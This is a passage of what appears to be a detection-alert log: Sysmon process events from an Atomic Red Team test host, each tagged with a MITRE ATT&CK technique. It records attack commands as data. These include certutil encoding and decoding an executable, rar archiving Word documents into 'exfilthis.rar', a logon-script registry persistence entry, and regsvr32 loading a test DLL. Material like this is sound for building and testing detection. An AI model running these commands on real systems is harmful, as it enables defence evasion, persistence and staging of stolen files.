<TimeCreated SystemTime=""2019-07-19T14:57:03.961276Z"">
</TimeCreated>
<EventRecordID>4063</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.786</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
<Data Name=""ProcessId"">4020</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -encode c:\file.exe file.txt)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.309488Z"">
</TimeCreated>
<EventRecordID>4062</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.261</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-00109E193C00</Data>
<Data Name=""ProcessId"">1260</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -encode c:\file.exe file.txt</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-00104C173C00</Data>
<Data Name=""ParentProcessId"">4832</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -encode c:\file.exe file.txt ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.309488Z"">
</TimeCreated>
<EventRecordID>4062</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.261</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-00109E193C00</Data>
<Data Name=""ProcessId"">1260</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -encode c:\file.exe file.txt</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-00104C173C00</Data>
<Data Name=""ParentProcessId"">4832</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548223.309488,2019-07-19T18:57:03.309488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.235828Z"">
</TimeCreated>
<EventRecordID>4061</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.223</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-00104C173C00</Data>
<Data Name=""ProcessId"">4832</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548097.044623,2019-07-19T18:54:57.044623+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:54:16.830063Z"">
</TimeCreated>
<EventRecordID>4054</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:54:16.818</Data>
<Data Name=""ProcessGuid"">747F3D96-D998-5D31-0000-00101BB73900</Data>
<Data Name=""ProcessId"">2424</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548056.830063,2019-07-19T18:54:16.830063+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;rar a -r exfilthis.rar *.docx&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:54:16.782667Z"">
</TimeCreated>
<EventRecordID>4053</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:54:16.766</Data>
<Data Name=""ProcessGuid"">747F3D96-D998-5D31-0000-001008B43900</Data>
<Data Name=""ProcessId"">2000</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;rar a -r exfilthis.rar *.docx&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548056.782667,2019-07-19T18:54:16.782667+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:54:01.955256Z"">
</TimeCreated>
<EventRecordID>4052</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:54:01.940</Data>
<Data Name=""ProcessGuid"">747F3D96-D989-5D31-0000-0010FC7B3900</Data>
<Data Name=""ProcessId"">4944</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548035.018275,2019-07-19T18:53:55.018275+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d &quot; cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:54.976854Z"">
</TimeCreated>
<EventRecordID>4049</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:54.968</Data>
<Data Name=""ProcessGuid"">747F3D96-D982-5D31-0000-0010DC633900</Data>
<Data Name=""ProcessId"">4240</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d &quot; cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548034.976854,2019-07-19T18:53:54.976854+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:47.239318Z"">
</TimeCreated>
<EventRecordID>4048</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:47.230</Data>
<Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-0010F0F03800</Data>
<Data Name=""ProcessId"">6888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:47.083068Z"">
</TimeCreated>
<EventRecordID>4047</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:47.056</Data>
<Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-00109DEB3800</Data>
<Data Name=""ProcessId"">5788</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine""> /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ParentProcessId"">5828</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:47.083068Z"">
</TimeCreated>
<EventRecordID>4047</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:47.056</Data>
<Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-00109DEB3800</Data>
<Data Name=""ProcessId"">5788</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine""> /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ParentProcessId"">5828</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
